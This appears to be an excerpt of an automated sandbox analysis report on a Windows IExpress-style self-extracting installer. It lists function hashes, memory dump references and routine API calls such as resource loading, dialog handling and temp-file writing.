Opcode ID: 94245af32674263759f9da71f1cf771c27bdae4cf10edea3f4fa0dbab4001895
Instruction ID: f2eb28ed49bef478b80de7b5bb438737f15d290be0d99ed45ea16a0b334d24fb
Opcode Fuzzy Hash: 94245af32674263759f9da71f1cf771c27bdae4cf10edea3f4fa0dbab4001895
Instruction Fuzzy Hash: 6D514A35E00219DBCB61CF99C984EAEBBB5FF48704F14416EE805E3311DBB69A41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004C43D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 004C43F1
GetWindowRect.USER32(00000000,?), ref: 004C440B
GetDC.USER32(?), ref: 004C4423
GetDeviceCaps.GDI32(00000000,00000008), ref: 004C442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 004C443A
ReleaseDC.USER32(?,00000000), ref: 004C4447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 004C44A2

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: 70351c80cec98d83f3e8b85d7218c092d290e3f1c2d63763d8c3fc8319ccbae9
Instruction ID: 068e0d4bd7d170f7601c03da7bef1a2ef4a1d5d2019c01d874101f5530f41d4d
Opcode Fuzzy Hash: 70351c80cec98d83f3e8b85d7218c092d290e3f1c2d63763d8c3fc8319ccbae9
Instruction Fuzzy Hash: E2314D36E00119AFCB14CFB8DD88DEEBBB5EB89314F254169F805F3240DA346C058B68

Uniqueness

Uniqueness Score: -1.00%

Function 004C6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 004C171E: _vsnprintf.MSVCRT ref: 004C1750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,004C51CA,00000004,00000024,004C2F71,?,00000002,00000000), ref: 004C62CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,004C51CA,00000004,00000024,004C2F71,?,00000002,00000000), ref: 004C62D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,004C51CA,00000004,00000024,004C2F71,?,00000002,00000000), ref: 004C631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 004C6345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,004C51CA,00000004,00000024,004C2F71,?,00000002,00000000), ref: 004C6357

Strings

UPDFILE%lu, xrefs: 004C62B3, 004C6329

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 54c64e8f8ce502eab368441ee15f71d185b3c9c07b6facf9b663e6b88f39e925
Instruction ID: 85cbf02954723dc9cb5b14ff4b83df5d7ee9c3c08ad45e7844afe55493c393b0
Opcode Fuzzy Hash: 54c64e8f8ce502eab368441ee15f71d185b3c9c07b6facf9b663e6b88f39e925
Instruction Fuzzy Hash: F7212879A00219ABDB509F658C49EFF7B78FB45708B15412EFD02A3211DB398D028BE9

Uniqueness

Uniqueness Score: -1.00%

Function 004C3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 004C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46A0
Part of subcall function 004C468F: SizeofResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46A9
Part of subcall function 004C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46C3
Part of subcall function 004C468F: LoadResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46CC
Part of subcall function 004C468F: LockResource.KERNEL32(00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46D3
Part of subcall function 004C468F: memcpy_s.MSVCRT ref: 004C46E5
Part of subcall function 004C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,004C2F64,?,00000002,00000000), ref: 004C3A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 004C3AB3

Part of subcall function 004C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004C4518
Part of subcall function 004C44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 004C4554

Part of subcall function 004C6285: GetLastError.KERNEL32(004C5BBC), ref: 004C6285

lstrcmpA.KERNEL32(<None>,00000000), ref: 004C3AD0
LocalFree.KERNEL32 ref: 004C3B13

Part of subcall function 004C6517: FindResourceA.KERNEL32(004C0000,000007D6,00000005), ref: 004C652A
Part of subcall function 004C6517: LoadResource.KERNEL32(004C0000,00000000,?,?,004C2EE8,00000000,004C19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 004C6538
Part of subcall function 004C6517: DialogBoxIndirectParamA.USER32(004C0000,00000000,00000547,004C19E0,00000000), ref: 004C6557
Part of subcall function 004C6517: FreeResource.KERNEL32(00000000,?,?,004C2EE8,00000000,004C19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 004C6560

LocalFree.KERNEL32(00000000,004C3100,00000000,00000000), ref: 004C3AF4

Strings

LICENSE, xrefs: 004C3A46
<None>, xrefs: 004C3AC5

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 706327c030912040857554537e71899c0ae94df1487dca59198febe96bdb7ae4
Instruction ID: 6d5ff841b341e1a1bc96b88f4731f589b018f92aae8ab19901fc9aff6dae3eff
Opcode Fuzzy Hash: 706327c030912040857554537e71899c0ae94df1487dca59198febe96bdb7ae4
Instruction Fuzzy Hash: 4411B179300201ABD7E4AF33AD09F273AA9DBD5755B11803FB546E62A1DE7E8C10872D

Uniqueness

Uniqueness Score: -1.00%

Function 004C24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 004C2506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 004C252C
_lopen.KERNEL32(?,00000040), ref: 004C253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 004C254C
_lclose.KERNEL32(00000000), ref: 004C2555

Strings

wininit.ini, xrefs: 004C2510

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: ae2226f75bbbd8d8db8ed7fdfd73f7efe38ea249914303fb5e30c3aef1b200d5
Instruction ID: 4fdd14c493c85a8c9adc12fcad4e87f091c247fc4ba389df3ed6fc13b3258110
Opcode Fuzzy Hash: ae2226f75bbbd8d8db8ed7fdfd73f7efe38ea249914303fb5e30c3aef1b200d5
Instruction Fuzzy Hash: E501B536A0011867C7A09F669C0CEDFBB7CDB45794F010169FA49D3190DE788E55CA99

Uniqueness

Uniqueness Score: -1.00%

Function 004C36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 004C3723
MessageBeep.USER32(00000000), ref: 004C39C3
MessageBoxA.USER32(00000000,00000000,smo,00000030), ref: 004C39F1

Strings

3, xrefs: 004C3785
smo, xrefs: 004C39E9, 004C3A19

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$smo
API String ID: 2519184315-1411035656
Opcode ID: f3136a90310d84892715111bf11fb27f1158f05d63943d60e6ffba6c60048c60
Instruction ID: 631422b65718aadab37d3882f1c4ae191b97b59ea4f78f9ac5622f32b0d1e4b5
Opcode Fuzzy Hash: f3136a90310d84892715111bf11fb27f1158f05d63943d60e6ffba6c60048c60
Instruction Fuzzy Hash: 0291F3B9A012249BDBF4CF15CD81FAA73A0AB45306F1580AFD84A97241DB798F81CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004C6517 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(004C0000,000007D6,00000005), ref: 004C652A
LoadResource.KERNEL32(004C0000,00000000,?,?,004C2EE8,00000000,004C19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 004C6538
DialogBoxIndirectParamA.USER32(004C0000,00000000,00000547,004C19E0,00000000), ref: 004C6557
FreeResource.KERNEL32(00000000,?,?,004C2EE8,00000000,004C19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 004C6560

Strings

.L, xrefs: 004C657C

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID: .L
API String ID: 1214682469-2421985291
Opcode ID: 2675d68ae24a0e7ca401cfcec4636b06705ad66151c369a00067a32c9c2502dc
Instruction ID: e607aa05dd4c6b272f0e9939bafec8ffc55f7feaf282bf9c05a1067181b87875
Opcode Fuzzy Hash: 2675d68ae24a0e7ca401cfcec4636b06705ad66151c369a00067a32c9c2502dc
Instruction Fuzzy Hash: CE014972500619BBCB505F69AC08EBB7B6CEB853A4F15413EFE0093250DB76CC20C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 004C6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 004C64DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 004C64F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 004C6502

Strings

advpack.dll, xrefs: 004C64C2, 004C64CD, 004C6501
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 004C64AC

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
API String ID: 438848745-875882553
Opcode ID: f39736494ebd1f1d49dbce3112ae9b4c517fc1adda85b62a2e245b1c901b602c
Instruction ID: 9408c69c30b3c8b2355235bc46ea604536382e83de6bf346aea8ab818a21520b
Opcode Fuzzy Hash: f39736494ebd1f1d49dbce3112ae9b4c517fc1adda85b62a2e245b1c901b602c
Instruction Fuzzy Hash: FD012638500108ABD7D0DB61EC49FEA7338EB55314F6001AEF485921D0CF789E868A09

Uniqueness

Uniqueness Score: -1.00%

Function 004C4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46A0
Part of subcall function 004C468F: SizeofResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46A9
Part of subcall function 004C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46C3
Part of subcall function 004C468F: LoadResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46CC
Part of subcall function 004C468F: LockResource.KERNEL32(00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46D3
Part of subcall function 004C468F: memcpy_s.MSVCRT ref: 004C46E5
Part of subcall function 004C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,004C30B4), ref: 004C4189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,004C30B4), ref: 004C41E7

Part of subcall function 004C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004C4518
Part of subcall function 004C44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 004C4554

Strings

<None>, xrefs: 004C41C5
FINISHMSG, xrefs: 004C4173, 004C41AB

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: 422349ff700bec61df3022132a64351decacca70f0d094393af036375104b3e0
Instruction ID: 993d32bc52a103885d594f5bc862984dc8e192b07fc7207d6cc7bde8cece433f
Opcode Fuzzy Hash: 422349ff700bec61df3022132a64351decacca70f0d094393af036375104b3e0
Instruction Fuzzy Hash: C201ADAD3002183BF3A41A664EAAF7B658EDBD5799F14403FBB46E12909E6CCC11417D

Uniqueness

Uniqueness Score: -1.00%

Function 004C7155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 004C7182
GetCurrentProcessId.KERNEL32 ref: 004C7191
GetCurrentThreadId.KERNEL32 ref: 004C719A
GetTickCount.KERNEL32 ref: 004C71A3
QueryPerformanceCounter.KERNEL32(?), ref: 004C71B8

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: d007bca84f1952442e738a66260f2a98e7930237f6cede1449bf8666aed2dad3
Instruction ID: 7469bf39987c2675869ae33fc936499363abea93a8a04a6bac7fd616195af12a
Opcode Fuzzy Hash: d007bca84f1952442e738a66260f2a98e7930237f6cede1449bf8666aed2dad3
Instruction Fuzzy Hash: 4F112875D012089BCB50DFB9DA48A9EB7F4EB18318F69486AD801E7210EB349A148B49

Uniqueness

Uniqueness Score: -1.00%

Function 004C19E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,?), ref: 004C1A18
GetDesktopWindow.USER32 ref: 004C1A24
LoadStringA.USER32(?,?,00000200), ref: 004C1A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 004C1A62
MessageBeep.USER32(000000FF), ref: 004C1A6A

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 1ecc4d97be2a7f9018fa54b97c59eb5bc3106df1c58ac547b2bd30630e747751
Instruction ID: 20d3fa4ac3fe952f2bd79dc0a3feb4da3e1c38f25593cefd4976da30dd3bfa9f
Opcode Fuzzy Hash: 1ecc4d97be2a7f9018fa54b97c59eb5bc3106df1c58ac547b2bd30630e747751
Instruction Fuzzy Hash: 8011A53560110DAFDB90EF64DD08FAE77B8EF49304F108169F916D21A1DE359E11CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004C63C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 004C642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 004C645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 004C647A

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 004C63EB

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 1065093856-3647970563
Opcode ID: 91311d9be33a9092e34cda390486c56e18b87ef67b3c3d15240ed821ba29684d
Instruction ID: 16053a4c5547c4ca50ba6842a47049e5edd8db7491bb0f62c2f13d0ebd54dca8
Opcode Fuzzy Hash: 91311d9be33a9092e34cda390486c56e18b87ef67b3c3d15240ed821ba29684d
Instruction Fuzzy Hash: EA21D575A0021CABD794DF26DC89FEB7368EB49318F10416EF585A3280DEB45D858F6C

Uniqueness

Uniqueness Score: -1.00%

Function 004C47E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,004C4E6F), ref: 004C47EA
LocalAlloc.KERNEL32(00000040,?), ref: 004C4823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 004C4847

Part of subcall function 004C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004C4518
Part of subcall function 004C44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 004C4554

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 004C4851

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 359063898-3647970563
Opcode ID: 3bf512198d74e1cb04b562c463963cb6194baf1c5641924bf758b7d40ba46e08
Instruction ID: 401271eac42abfe8a86ad5a00a63a9dce7a8ec351e2c3b78daecbd3182a30c5d
Opcode Fuzzy Hash: 3bf512198d74e1cb04b562c463963cb6194baf1c5641924bf758b7d40ba46e08
Instruction Fuzzy Hash: F411297D604641AFE7949F249D28F733B5AEBC5304B14852EF98287341DE398C068778

Uniqueness

Uniqueness Score: -1.00%

Function 004C3680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 004C369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004C36B2
DispatchMessageA.USER32(?), ref: 004C36CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004C36DA

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 96e27b640db6b76a554689f79bdcc5a478cd252d92f4b2e635016b1f459e0a94
Instruction ID: 75bf9c989557951f8deae1709005fda4bb5c82157415a7513b704f4f8450475a
Opcode Fuzzy Hash: 96e27b640db6b76a554689f79bdcc5a478cd252d92f4b2e635016b1f459e0a94
Instruction Fuzzy Hash: 11018476A0021877DB704AA65C4CFEB777CEB85B15F04412EB905E2280DA648654C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 004C65E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,004C2B33), ref: 004C6602
CharPrevA.USER32(?,00000000), ref: 004C6612
CharPrevA.USER32(?,00000000), ref: 004C6629
CharNextA.USER32(00000000), ref: 004C6635

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 3c8724b86e09b7512dcafbd5e98a529b7dd78d591679657086586eb5a66f0054
Instruction ID: e4f7bec6c41375f473ab7103a3d6f44153b0ca8c1f22e67a7669827e419a45de
Opcode Fuzzy Hash: 3c8724b86e09b7512dcafbd5e98a529b7dd78d591679657086586eb5a66f0054
Instruction Fuzzy Hash: 89F02D391041506ED7721B299C8CEB7BF9CCF87358B2F417FE49183101DA190D06866A

Uniqueness

Uniqueness Score: -1.00%

Function 004C69B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 004C6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 004C6FC5

__set_app_type.MSVCRT ref: 004C69C2
__p__fmode.MSVCRT ref: 004C69D8
__p__commode.MSVCRT ref: 004C69E6
__setusermatherr.MSVCRT ref: 004C6A07

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: 335552128f163e89790ee5cba2e912ee032b9465124cc892cbcafedcf91b4799
Instruction ID: 7b8f6ede7f11d6cb1e45c3982b28e1de16c7f72fff784c825fe56cb310c56be5
Opcode Fuzzy Hash: 335552128f163e89790ee5cba2e912ee032b9465124cc892cbcafedcf91b4799
Instruction Fuzzy Hash: F9F0F2781083159FC7D8AB31ED0AF093BA1FB05329B11467EE462863E1CF7E85518E1D

Uniqueness

Uniqueness Score: -1.00%

